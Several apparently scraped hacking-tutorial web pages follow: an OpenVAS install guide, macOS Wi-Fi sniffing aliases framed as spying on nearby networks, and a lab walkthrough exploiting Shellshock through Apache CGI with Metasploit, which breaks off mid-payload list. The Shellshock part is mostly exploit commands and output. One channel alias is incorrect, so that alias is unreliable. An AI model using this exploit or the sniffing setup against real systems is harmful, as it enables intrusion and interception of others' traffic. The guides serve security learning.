command:apt install openvasIf the proposed changes to your system look acceptable, press theenterkey. If not, hitnon your keyboard and pressenter. These changes look acceptable to me. It may be important to note the size of OpenVAS. It clocks in around a gigabyte, which may be too heavy for systems with smaller disks.Step 3: Set Up OpenVASUnlike many packages in Kali Linux which can simply be installed and then run, OpenVAS requires some additional user interaction. Luckily, this process is, for the most part, automated.We will be running the command:openvas-setupBut before we do, let's have a look at the setup script itself. I usually like to read through shell scripts just to get some insight into what will be done to my system. The easiest way to read the file is by issuing the command:cat `which openvas-setup` | lessLet's break this command down a little bit more. Thecatutility will print files to standard output. In order to save on typing, I have enclosedwhich openvas-setupin back ticks. Bash will evaluate the command in the back ticks first giving me the path of the OpenVAS setup script. I then pipe it intoless(my preferred pager) so that I can read through it.Looking over scripts before running them as root is almost always a good idea. While detailing the entirety of what this script does is beyond the scope of this article, if it is confusing, I recommend doing some reading on Bash scripting.More Information:Bash (Shell) Scripting for BeginnersSince we're satisfied that script isn't going to harm our machine, we'll execute it with the command:openvas-setupThis setup may take awhile. Once the setup has completed, you will be presented with a password to log into the Greenbone Security Assistant (GSA), a web-based interface for managing OpenVAS. It's important to keep this password since we will use it to sign in later.Step 4: Configure Remote Access to the GSA (Optional)OpenVAS should now be configured and operating on your system. If you are running Kali in a VM or on the metal, go ahead and skip to the next step.Since I'm running headless, I want to be able to access the Greenbone Security Assistant from my local network. In previous versions of Kali, this was done by editing files located in /etc/default. Now, we need to work with systemd. First, we create the GSA configuration folder:mkdir /etc/systemd/system/greenbone-security-assistant.service.d/Next, type the following:vim /etc/systemd/system/greenbone-security-assistant.service.d/local.confThis file should contain:[Service]ExecStart=ExecStart=/usr/sbin/gsad --foreground --listen=0.0.0.0 --port=9392 --mlisten=0.0.0.0 --mport=9390This is telling the GSA daemon to listen on all interfaces. Now we need to get the OpenVAS manager working with the GSA. So we will create a new directory:mkdir /etc/systemd/system/openvas-manager.service.dNext, we create the local configuration:vim /etc/systemd/system/openvas-manager.service.d/local.confThis file should contain:[Service]ExecStart=ExecStart=/usr/sbin/openvasmd --listen=0.0.0.0 --port=9390 --database=/var/lib/openvas/mgr/tasks.dbThis binds the openvasmd to all interfaces. Next we run:openvas-stopsystemctal daemon-reloadopenvas-startIf you encounter any issues, you can useopenvas-check-setupto check for configuration errors. You can also ensure that systemd is loading your modified service files viasystemctl. To ensure that everything is bound properly, just run a quicknetstat -antup.Don't Miss:How to Scan for Vulnerabilities with NessusStep 5: Access GSAYou can now access GSA with your favorite browser, either at https://localhost, or, if you followed along in the previous step, across the network. GSA will, by default, take port 443 for connections, if that port is available. If it isn't, you can access GSA at https://localhost:9392, or across the network if you followed the steps above. When you connect, you will be presented with a warning about an insecure connection.You will need to add an exception for this certificate, which will vary depending on the browser you're using, but is usually found under the "advanced" tab. Once you have added the exception, you will be greeted by the GSA login page. The credentials are the admin and password which was generated during setup. Once you are logged in, you will see the following GSA interface.Stick Around for MoreNow that OpenVAS is installed and configured to our liking, we can proceed to use GSA to conduct vulnerability scanning. In the next article, I will be discussing the GSA interface, configuring scans with GSA, and more. Stay tuned.Next Up:Perform a Large-Scale Network Security Audit with OpenVAS's GSAFollow Null Byte onTwitterandGoogle+Follow WonderHowTo onFacebook,Twitter,Pinterest, andGoogle+Want to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover image and screenshots by Barrow/Null ByteRelatedHow To:Perform a Large-Scale Network Security Audit with OpenVAS's GSAHow To:Get OpenVas Working Properly in KaliHow To:Use NMAP 7 to Discover Vulnerabilities, Launch DoS Attacks and More!Hack Like a Pro:How to Hack Web Apps, Part 5 (Finding Vulnerable WordPress Websites)Hack Like a Pro:Using Nexpose to Scan for Network & System VulnerabilitiesHack Like a Pro:How to Hack Web Apps, Part 6 (Using OWASP ZAP to Find Vulnerabilities)How To:The Definitive Guide to Android MalwareAndroid for Hackers:How to Scan Websites for Vulnerabilities Using an Android Phone Without RootHow To:Easily Detect CVEs with Nmap ScriptsHow To:Scan for Vulnerabilities on Any Website Using NiktoHack Like a Pro:How to Scan for Vulnerabilities with NessusHack Like a Pro:How to Scan the Internet for Heartbleed VulnerabilitiesHack Like a Pro:How to Find Almost Every Known Vulnerability & Exploit Out ThereHack Like a Pro:How to Find the Latest Exploits and Vulnerabilitiesβ€”Directly from MicrosoftHow To:Complete a bedside assessment in nursingNews:Intel Confirmed Critical Escalation of Privilege Vulnerability β€” Now What?How To:Probe Websites for Vulnerabilities More Easily with the TIDoS FrameworkNews:eBay Vulnerability Allows Scammers to Attack Android & iOS with Malicious ProgramsHow To:Find Your Computer's Vulnerability Using LynisHow To:Perform an OB fundus assessment in nursingHow To:Stop the New Java 7 Exploit from Installing Malware on Your Mac or PCNews:Samsung Keyboard Vulnerability Exposes 600M Mobile Devices!How to Hack Like a Pro:Getting Started with MetasploitIPsec Tools of the Trade:Don't Bring a Knife to a GunfightNews:Sports Injury SolutionsNews:Was Pixar's Up a Rip-off?News:Flaw in Facebook & Google Allows Phishing, Spam & MoreOpen Borders:Fast and Furious: Infowars Exclusive (HQ)News:Monster.comNews:Queens City Councilman Peter Vallone Jr. Wants to Ban Fat CapsNews:Economic Reform in the CommunityHow To:Spider Web Pages with Nmap for SQLi VulnerabilitiesNews:Half a Million Macs Affected by Flashback Trojan! Eradicate It Before It's Too LateNews:Lesson Plan #1News:Bugzilla Cross Site Request ForgeryNews:Lots of WordPress plugin vulnerabilitiesScrabble Bingo of the Day:EURYOKYHow To:Tips On How To Find The Best Affiliate Marketing ProgramsHow To:Mac OS X Hit Again! How to Find and Delete the New SabPub MalwareHow To:Hack Coin-Operated Laudromat Machines for Free Wash & Dry Cycles
Mac for Hackers: How to Set Up a MacOS System for Wi-Fi Packet Capturing Β« Null Byte :: WonderHowTo
MacOS isn't known as an ideal operating system for hacking without customization, but it includes native tools that allow easy control of the Wi-Fi radio for packet sniffing. Changing channels, scanning for access points, and even capturing packets all can be done from the command line. We'll use aliasing to set some simple commands for easy native packet capture on a macOS system.MacOS Built in ToolsIf you can't download or install new tools onto a MacBook or other macOS computer, capturing packets or performing Wi-Fi scanning might not appear straightforward. In fact, while there are terminal commands to do this, they are incredibly long and not very intuitive for beginners. For example, to perform a simple Wi-Fi scan for nearby access points, the command is as follows./System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -sThat command isn't exactly easy to remember, so instead, we can shorten them dramatically by mapping the most useful commands for Wi-Fi scanning and sniffing to shorter, more memorable ones. Of the available commands, the most important are scanning the current connection for available detail, scanning for nearby access points, switching the current Wi-Fi channel, and beginning a packet capture session.Using Wireshark on MacOSWhileWiresharkis the standard tool for packet capture, it does have a few limitations that mean you'll need to get into the macOS terminal commands anyway. Because Wireshark can't set the channel the card in a macOS computer is on, it can only listen in on a channel that your laptop can connect to a network on; This is pretty annoying because, by default, you can only see traffic directed to your machine.Don't Miss:Use Kismet to Watch Wi-Fi User Activity Through WallsBy changing some settings in Wireshark, you can begin to see all of the traffic on a particular channel, but this still doesn't give you the ability to sniff on channels on which you have no network to join. To solve this, we'll need to use a macOS tool to set the channel manually so that we can switch between channels of interest based on the result of a scan of nearby APs.What You'll NeedThese commands should work on most macOS systems, even ones not fully updated. Because they're built-in system tools, you won't need to download anything to get them to work. If you're using a MacBook Air, Pro, or other Apple device running macOS with a wireless card, these commands should work fine. You will need the ability to run commands as sudo, as most of these commands require administrator access.Step 1: Create an AliasFirst, to create an alias, we'll be editing our terminal Bash profile; This will allow us to map lengthy or more complicated commands we frequently use to smaller commands. To do this, open a new terminal window and type the following.nano .bash_profileThat command will open up a text file that should say something like this:# Setting PATH for Python 3.6 # The original version is saved in .bash_profile.pysave PATH="/Library/Frameworks/Python.framework/Versions/3.6/bin:${PATH}" export PATHBeneath that, you can begin to add aliases. So how do they work? The anatomy of a Bash alias looks like this:alias (NameOfAlias)='(TheCommandsYouWantTheAliasToRun)'Using that format, let's write and text our first alias.Useful Aliases for AP DiscoveryTo get started, we'll be using a command to scan the area and give a list of every nearby AP. This includes information we need to locate and capture a target wireless network. By running this scan, we can match the name of a network to the channel it is broadcasting on, discover the BSSID of nearby networks, the signal strength, and the type of security used in the network.Don't Miss:Wardrive with the Kali Raspberry Pi to Map Wi-Fi DevicesAll of this information is handy for targeting nearby networks or deciding which channel to sniff on. To do this scan, we need to type the following command into a terminal window.sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -sI prefer to shorten this to an alias I've namedscanareafor quick access. To create this alias, typenano .bash_profileand then add the following code at the bottom of the text document.alias scanarea='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport -s'PressCtrl-Xto close out of the text file, typingYto save the changes when prompted. To test the alias, quit your terminal program and reopen it again. After restarting your terminal window, you should now be able to see the alias there by typingaliasinto a terminal window.Now, you should be able to typescanareainto a terminal window, enter your password, and see a list of all nearby Wi-Fi networks.SSID BSSID RSSI CHANNEL HT CC SECURITY (auth/unicast/group) BPS Guest Access 92:2a:a8:58:bf:51 -86 132,+1 Y -- WPA2(PSK/AES/AES) BPS Mgmt 82:2a:a8:58:bf:51 -87 132,+1 Y -- WPA2(PSK/AES/AES) BWXLVS 54:3d:37:7a:1a:bc -85 56 Y US WPA2(PSK/AES/AES) attwifi 54:3d:37:3a:1a:bc -85 56 Y US NONE ALPHA fc:0a:81:78:16:c1 -83 11 Y US WPA2(PSK/AES/AES) _Travelers WiFi 00:14:06:11:4a:40 -77 11 N -- NONE BPS Guest Access 82:2a:a8:57:bf:51 -83 11 Y -- WPA2(PSK/AES/AES) DELTA fc:0a:81:78:16:c4 -82 11 Y US WPA2(802.1x/AES/AES) _LasVegas.Net HC 00:14:06:11:4a:41 -77 11 N -- NONE Caesars_Resorts fc:0a:81:78:16:c0 -83 11 Y US NONE ND BOH d0:17:c2:ea:99:b0 -81 10 Y -- WPA2(PSK/AES/AES) HP-Print-F2-Officejet Pro 8600 a4:5d:36:43:a4:f2 -88 8 N -- WPA2(PSK/AES/AES) BETA fc:0a:81:78:4a:42 -68 6 Y US WPA2(PSK/AES/AES) DELTA fc:0a:81:78:42:c4 -64 6 Y US WPA2(802.1x/AES/AES) DELTA fc:0a:81:78:4a:44 -69 6 Y US WPA2(802.1x/AES/AES) Caesars_Resorts fc:0a:81:78:42:c0 -64 6 Y US NONE GAMMA fc:0a:81:78:42:c3 -64 6 Y US WPA2(802.1x/AES/AES) Caesars_Resorts fc:0a:81:78:4a:40 -67 6 Y US NONE DIRECT-84-HP OfficeJet Pro 8720 30:e1:71:d7:bc:85 -74 6 Y -- WPA2(PSK/AES/AES) Caesars_Resorts fc:0a:81:78:4a:60 -86 1 Y US NONE GAMMA fc:0a:81:78:56:53 -74 1 Y US WPA2(802.1x/AES/AES) ALPHA fc:0a:81:0d:7c:91 -84 1 Y US WPA2(PSK/AES/AES) ALPHA fc:0a:81:78:40:51 -73 1 Y US WPA2(PSK/AES/AES) ALPHA fc:0a:81:78:56:51 -68 1 Y US WPA2(PSK/AES/AES)Reopen the Bash profile and add the following code to also be able to display what channel the card is currently set to, as well as information about the AP you're currently connected to.alias currentap='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --getinfo'After again saving and closing the file, you should be able to open a fresh terminal window, and after restarting terminal, type "currentap" to learn information about the current link status of your computer.currentap agrCtlRSSI: 0 agrExtRSSI: 0 agrCtlNoise: 0 agrExtNoise: 0 state: init op mode: lastTxRate: 0 maxRate: 0 lastAssocStatus: 16 802.11 auth: open link auth: none BSSID: 0:0:0:0:0:0 SSID: MCS: -1 channel: 4 Dell-2:~ skickar$ currentap agrCtlRSSI: -56 agrExtRSSI: 0 agrCtlNoise: -93 agrExtNoise: 0 state: running op mode: station lastTxRate: 130 maxRate: 144 lastAssocStatus: 0 802.11 auth: open link auth: none BSSID: fc:a:81:78:40:90 SSID: Caesars_Resorts MCS: 15 channel: 149Step 2: Use Wireshark & Setting the AP ChannelNext, we can use aliasing to solve the problem of running Wireshark on a macOS computer without being able to select the channel. To create a channel-changing alias, we can use the following scripts for each of the 13 channels available on 2.4 GHz networks.alias setchannelto1='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --channel=2' alias setchannelto2='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --channel=2' alias setchannelto3='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --channel=3' alias setchannelto4='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --channel=4' alias setchannelto5='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --channel=5' alias setchannelto6='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --channel=6' alias setchannelto7='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --channel=7' alias setchannelto8='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --channel=8' alias setchannelto9='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --channel=9' alias setchannelto10='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --channel=10' alias setchannelto11='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --channel=11' alias setchannelto12='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --channel=12' alias setchannelto13='sudo /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport --channel=13'This command can't have any spaces in it, so we need to create a new alias for each channel that we want our Wi-Fi card to be able to switch to.Save this alias withCtrl-Xand then agree to save by typingY. Quit your terminal session, and reopen it to see the command available by typingaliasinto a fresh terminal window. While this command is the most useful, it is also one that is likely to need to be run more than once.Don't Miss:Spy on Your 'Buddy's' Network Traffic with WiresharkTo make sure this command works, disconnect from any access point you are currently connected to. You may need to "forget" nearby networks in order to do so, by going into your advanced network settings. Once you are disconnected from any AP and with the Wi-Fi card turned on, try to set the channel to channel 4 by typingsetchannelto4in a terminal window. Then, runcurrentapto find which channel you're on.setchannelto4 currentap agrCtlRSSI: 0 agrExtRSSI: 0 agrCtlNoise: 0 agrExtNoise: 0 state: init op mode: lastTxRate: 0 maxRate: 0 lastAssocStatus: 16 802.11 auth: open link auth: none BSSID: 0:0:0:0:0:0 SSID: MCS: -1 channel: 4If it's not on the right AP, turn your Wi-Fi card off and back on again, then run the command again. You may need to do this a few times, as macOS will tend to ignore this if it thinks it can connect to an AP in range.If you're running Wireshark, you should be able to see packets all start coming in on the same channel; This means that you've successfully switched the wireless card to the desired channel.Step 3: Capture Packets NativelyNow that we have the ability to set the channel we're sniffing on, go ahead and set it to your desired channel. Next, we can start sniffing packets on that channel by returning to our Bash profile and adding the following alias.alias sniff='sudo /usr/libexec/airportd en0 sniff'Running this command will begin saving all observed packets to a .cap file, which you can open in Wireshark later to interpret. Once the alias is set and you've saved and closed the file, quit terminal, and reopened it to make the alias available for use.Don't Miss:Detect Script-Kiddie Wi-Fi Jamming with WiresharkBegin sniffing packets by typingsniffin a terminal window. When you're finished, pressCtrl-Cto stop sniffing and save the captured packets to a .cap file.sniff Capturing 802.11 frames on en0. Session saved to /tmp/airportSniffuwvwnx.cap.Step 4: Open Captured Packets in WiresharkFinally, if you have a .cap file you want to open in Wireshark, the command to do so is easy. With the name of your macOS capture file handy, you can open Wireshark to inspect the packets you've captured if you have Wireshark installed, or later on another device, by typing the following command.wireshark -r /tmp/yourfilename.capThis will open the capture in Wireshark, allowing you to confirm you got the capture you needed and inspect the intercepted packets.Any MacOS System Can Be a Packet Capturing NodeMacOS computers are commonplace in many tech and creative business environments, and learning to use the built-in tools to your advantage means nothing but access is required to begin capturing packets from networks around you.Utilizing aliasing makes the built-in commands shorter and more memorable, allowing a hacker to create an easy workflow for discovering, tuning to, and capturing traffic from networks of interest. Using these tactics, a macOS computer near your target is everything you need to spy on local Wi-Fi communications.I hope you enjoyed this guide to configuring an Apple computer to control the wireless card and sniff Wi-Fi packets! If you have any questions about this guide on working with macOS or you have a comment, feel free to reach me below or on [email protected]'t Miss:The Everyman's Guide to How Network Packets Are Routed Across the WebFollow Null Byte onTwitter,Flipboard, andYouTubeFollow WonderHowTo onFacebook,Twitter,Pinterest, andFlipboardWant to start making money as a white hat hacker?Jump-start your hacking career with our2020 Premium Ethical Hacking Certification Training Bundlefrom the newNull Byte Shopand get over 60 hours of training from cybersecurity professionals.Buy Now (90% off) >Other worthwhile deals to check out:97% off The Ultimate 2021 White Hat Hacker Certification Bundle99% off The 2021 All-in-One Data Scientist Mega Bundle98% off The 2021 Premium Learn To Code Certification Bundle62% off MindMaster Mind Mapping Software: Perpetual LicenseCover photo by Kody/Null ByteRelatedHow To:Crack Wi-Fi Passwordsβ€”For Beginners!How to Hack Wi-Fi:Cracking WEP Passwords with Aircrack-NgHow To:Identify Antivirus Software Installed on a Target's Windows 10 PCHow To:Detect Script-Kiddie Wi-Fi Jamming with WiresharkHacking macOS:How to Sniff Passwords on a Mac in Real Time, Part 1 (Packet Exfiltration)How to Hack with Arduino:Tracking Which Networks a Mac Has Connected To & WhenHow to Hack Wi-Fi:Getting Started with the Aircrack-Ng Suite of Wi-Fi Hacking ToolsHow To:Securely Sniff Wi-Fi Packets with SniffglueHow To:Spy on Network Relationships with Airgraph-NgHow to Hack Wi-Fi:Choosing a Wireless Adapter for HackingHow To:Hunt Down Wi-Fi Devices with a Directional AntennaHow to Hack Wi-Fi:Disabling Security Cameras on Any Wireless Network with Aireplay-NgHow To:The Ultimate Guide to Hacking macOSHow To:Hack Open Hotel, Airplane & Coffee Shop Wi-Fi with MAC Address SpoofingHow To:Detect When a Device Is Nearby with the ESP8266 Friend DetectorHow to Hack Wi-Fi:Selecting a Good Wi-Fi Hacking StrategyHow To:Spy on Traffic from a Smartphone with WiresharkHacker Fundamentals:The Everyman's Guide to How Network Packets Are Routed Across the WebHow To:Analyze Wi-Fi Data Captures with Jupyter NotebookHow to Hack with Arduino:Building MacOS Payloads for Inserting a Wi-Fi BackdoorHow To:Track Wi-Fi Devices & Connect to Them Using ProbequestHack Like a Pro:How to Get Even with Your Annoying Neighbor by Bumping Them Off Their WiFi Network β€”UndetectedHow To:Hack 5 GHz Wi-Fi Networks with an Alfa Wi-Fi AdapterHow To:Use Kismet to Watch Wi-Fi User Activity Through WallsHow To:Hack Wi-Fi Networks with BettercapHow To:Crack WPA & WPA2 Wi-Fi Passwords with PyritHow To:Scan, Fake & Attack Wi-Fi Networks with the ESP8266-Based WiFi DeautherHacking Gear:10 Essential Gadgets Every Hacker Should TryHow To:The Beginner's Guide to Defending Against Wi-Fi HackingHow to Hack Wi-Fi:Hunting Down & Cracking WEP NetworksHow To:Detect & Classify Wi-Fi Jamming Packets with the NodeMCUHow to Hack Wi-Fi:Get Anyone's Wi-Fi Password Without Cracking Using WifiphisherHow To:Enable Monitor Mode & Packet Injection on the Raspberry PiHow To:Use MDK3 for Advanced Wi-Fi JammingVideo:How to Crack Weak Wi-Fi Passwords in Seconds with Airgeddon on Parrot OSHow to Hack Wi-Fi:Cracking WPA2 Passwords Using the New PMKID Hashcat AttackHacking Android:How to Create a Lab for Android Penetration TestingHow To:Check if Your Wireless Network Adapter Supports Monitor Mode & Packet InjectionMac for Hackers:How to Get Your Mac Ready for HackingHacking macOS:How to Perform Situational Awareness Attacks, Part 1 (Using System Profiler & ARP)
How to Exploit Shellshock on a Web Server Using Metasploit Β« Null Byte :: WonderHowTo
One of the most critical bugs to come out in the last five years wasShellshock, a vulnerability which allows attackers to execute arbitrary code via the Unix Bash shell remotely. This vulnerability has been around for a while now, but due to the ubiquity of Unix machines connected to the web, Shellshock is still a very real threat, especially for unpatched systems.How the Shellshock Vulnerability WorksShellshock first appearedback in September 2014. There were reports of attacks within hours of the initial disclosure of the vulnerability, and over the next few days, there were millions of attacks and probes coming frombotnets.Bashis a shell, or interpreter, that allows commands to be run on a system, typically via a text window. It usually is the default shell on Unix systems, and as such, can be found on Linux,macOS, and other various Unix flavors. This is why Shellshock is so severe β€” over half theweb serverson the internet are running Unix, not to mention a myriad ofIoT devicesand even somerouters.Don't Miss:Use Command Injection to Pop a Reverse Shell on a Web ServerEssentially, Shellshock works by allowing an attacker to append commands to function definitions in the values of environment variables. This would be classified as a type of code injection attack, and since Bash will process these commands after the function definition, pretty much any arbitrary code can be executed.Shellshock is actually an entire family of vulnerabilities consisting of multiple exploitation vectors. In this guide, we will be exploiting theCGIscript attack vector, specifically, the mod_cgi module that is part of theApache HTTP Server.How Apache & CGI Play into ThisApache is a cross-platform open-source web server developed by the Apache Software Foundation. It is robust with features such as virtual hosting, authentication schemes, SSL and TLS, custom error messages, and multiple programming language support. Apache also has a module called mod_cgi which handles the execution of Common Gateway Interface (CGI) scripts.CGI is a protocol designed to allow web servers to execute console-like programs directly on the server. These programs, known as CGI scripts, often handle data from dynamic webpages and interact overHTTP. A new directory, typically named cgi-bin or something similar, has to be designated to enable CGI scripts to run. When a browser requests the URL of a specific file contained within the CGI directory, the server runs the script, and the output is passed back to the browser.When CGI scripts are run, specific information is copied to the environment variables. That information will subsequently be passed to Bash if it is called, thus providing a way for an attacker to inject malicious code. Luckily, theRapid7team developed aMetasploitmodule that makes exploiting this vulnerability very easy.Don't Miss:Hack the Shellshock Vulnerability with an Auxilliary ModuleWhat You Need for This WalkthroughMetasploitable 2is an excellent virtual machine full of vulnerabilities to practice your hacking skills on. I will be attacking that on an isolated network with the faithfulKali Linux. You may want to do the same to make sure you get the same results when first trying this out; then you can move on to pentesting real machines.Step 1: Configure TargetFor this exploit to work, there needs to be an executable script located in the /cgi-bin directory. A simple "Hello world!" Bash script will do for demonstration purposes. Navigate to/usr/lib/cgi-binon the target machine, and type the following command:sudo nano hello.shEnter the correct password, then make the file look like this:#! /bin/bash echo "Content-type: text/html" echo "" echo "Hello world!"PressCtrl-X, followed byY, andEnterto save. To make this file executable, use thechmodcommand:sudo chmod 755 hello.shWe can verify this is working correctly by browsing to the file on the web server:Step 2: Prepare ExploitOn the Kali machine, fire up Metasploit by typingmsfconsolein the terminal. We're greeted with a random banner and Metasploit's command prompt:root@kali:~# msfconsole ____________ [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| $S`?a, |%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%__%%%%%%%%%%| `?a, |%%%%%%%%__%%%%%%%%%__%%__ %%%%] [% .--------..-----.| |_ .---.-.| .,a$%|.-----.| |.-----.|__|| |_ %%] [% | || -__|| _|| _ || ,,aS$""` || _ || || _ || || _|%%] [% |__|__|__||_____||____||___._||%$P"` || __||__||_____||__||____|%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%| `"a, ||__|%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%|____`"a,$$__|%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% `"$ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] [%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%] =[ metasploit v4.17.3-dev- ] + -- --=[ 1795 exploits - 1019 auxiliary - 310 post ] + -- --=[ 538 payloads - 41 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf >We can easily search for exploits by using thesearchcommand. Typesearch shellshock, locate theapache_mod_cgi_bash_env_execmodule, and copy the location:msf > search shellshock [!] Module database cache not built yet, using slow search Matching Modules ================ Name Disclosure Date Rank Description ---- --------------- ---- ----------- auxiliary/scanner/http/apache_mod_cgi_bash_env 2014-09-24 normal Apache mod_cgi Bash Environment Variable Injection (Shellshock) Scanner auxiliary/server/dhclient_bash_env 2014-09-24 normal DHCP Client Bash Environment Variable Code Injection (Shellshock) exploit/linux/http/advantech_switch_bash_env_exec 2015-12-01 excellent Advantech Switch Bash Environment Variable Code Injection (Shellshock) exploit/linux/http/ipfire_bashbug_exec 2014-09-29 excellent IPFire Bash Environment Variable Injection (Shellshock) exploit/multi/ftp/pureftpd_bash_env_exec 2014-09-24 excellent Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock) exploit/multi/http/apache_mod_cgi_bash_env_exec 2014-09-24 excellent Apache mod_cgi Bash Environment Variable Code Injection (Shellshock) exploit/multi/http/cups_bash_env_exec 2014-09-24 excellent CUPS Filter Bash Environment Variable Code Injection (Shellshock) exploit/multi/misc/legend_bot_exec 2015-04-27 excellent Legend Perl IRC Bot Remote Code Execution exploit/multi/misc/xdh_x_exec 2015-12-04 excellent Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution exploit/osx/local/vmware_bash_function_root 2014-09-24 normal OS X VMWare Fusion Privilege Escalation via Bash Environment Code Injection (Shellshock) exploit/unix/dhcp/bash_environment 2014-09-24 excellent Dhclient Bash Environment Variable Injection (Shellshock) exploit/unix/smtp/qmail_bash_env_exec 2014-09-24 normal Qmail SMTP Bash Environment Variable Injection (Shellshock) msf >Load this exploit by typingusefollowed by the location that we previously copied. Now there should be a longer prompt indicating the module that is currently loaded.msf > use exploit/multi/http/apache_mod_cgi_bash_env_exec msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >Typeoptionsto see the various settings for this module:msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > options Module options (exploit/multi/http/apache_mod_cgi_bash_env_exec): Name Current Setting Required Description ---- --------------- -------- ----------- CMD_MAX_LENGTH 2048 yes CMD max line length CVE CVE-2014-6271 yes CVE to check/exploit (Accepted: CVE-2014-6271, CVE-2014-6278) HEADER User-Agent yes HTTP header to use METHOD GET yes HTTP method to use Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOST yes The target address RPATH /bin yes Target PATH for binaries used by the CmdStager RPORT 80 yes The target port (TCP) SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0 SRVPORT 8080 yes The local port to listen on. SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI yes Path to CGI script TIMEOUT 5 yes HTTP read response timeout (seconds) URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host Exploit target: Id Name -- ---- 0 Linux x86 msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >We can leave most of the defaults, but we'll need to set the remote host to the IP address of the target, and the target URI to the file we placed in the /cgi-bin directory, like so:msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set rhost 172.16.1.102 rhost => 172.16.1.102 msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > set targeturi /cgi-bin/hello.sh targeturi => /cgi-bin/hello.sh msf exploit(multi/http/apache_mod_cgi_bash_env_exec) >Next, we need to choose a payload. Typeshow payloadsto view different payloads and information regarding each of them:msf exploit(multi/http/apache_mod_cgi_bash_env_exec) > show payloads Compatible Payloads =================== Name Disclosure Date Rank Description ---- --------------- ---- ----------- generic/custom normal Custom Payload generic/debug_trap normal Generic x86 Debug Trap generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline generic/shell_reverse_tcp normal Generic Command Shell, Reverse TCP Inline generic/tight_loop normal Generic x86 Tight Loop linux/x86/chmod normal Linux Chmod linux/x86/exec normal Linux Execute Command linux/x86/meterpreter/bind_ipv6_tcp normal Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86) linux/x86/meterpreter/bind_ipv6_tcp_uuid normal Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86) linux/x86/meterpreter/bind_nonx_tcp normal Linux Mettle x86, Bind TCP Stager linux/x86/meterpreter/bind_tcp normal Linux Mettle x86, Bind TCP Stager (Linux x86) linux/x86/meterpreter/bind_tcp_uuid normal Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86) linux/x86/meterpreter/reverse_ipv6_tcp normal Linux Mettle x86, Reverse TCP Stager (IPv6) linux/x86/meterpreter/reverse_nonx_tcp normal Linux Mettle x86, Reverse TCP Stager linux/x86/meterpreter/reverse_tcp normal Linux Mettle x86, Reverse TCP Stager linux/x86/meterpreter/reverse_tcp_uuid normal Linux Mettle x86, Reverse TCP Stager linux/x86/metsvc_bind_tcp normal Linux Meterpreter Service, Bind TCP linux/x86/metsvc_reverse_tcp normal Linux Meterpreter Service, Reverse TCP Inline linux/x86/read_file normal Linux Read File linux/x86/shell/bind_ipv6_tcp normal Linux Command Shell, Bind IPv6 TCP Stager (Linux x86) linux/x86/shell/bind_ipv6_tcp_uuid normal Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86) linux/x86/shell/bind_nonx_tcp normal Linux Command Shell, Bind TCP Stager linux/x86/shell/bind_tcp normal Linux Command Shell, Bind TCP Stager (Linux x86) linux/x86/shell/bind_tcp_uuid normal Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86) linux/x86/shell/reverse_ipv6_tcp normal Linux Command Shell, Reverse TCP Stager (IPv6) linux/x86/shell/reverse_nonx_tcp normal Linux Command Shell, Reverse TCP Stager linux/x86/shell/reverse_tcp normal Linux Command Shell, Reverse TCP 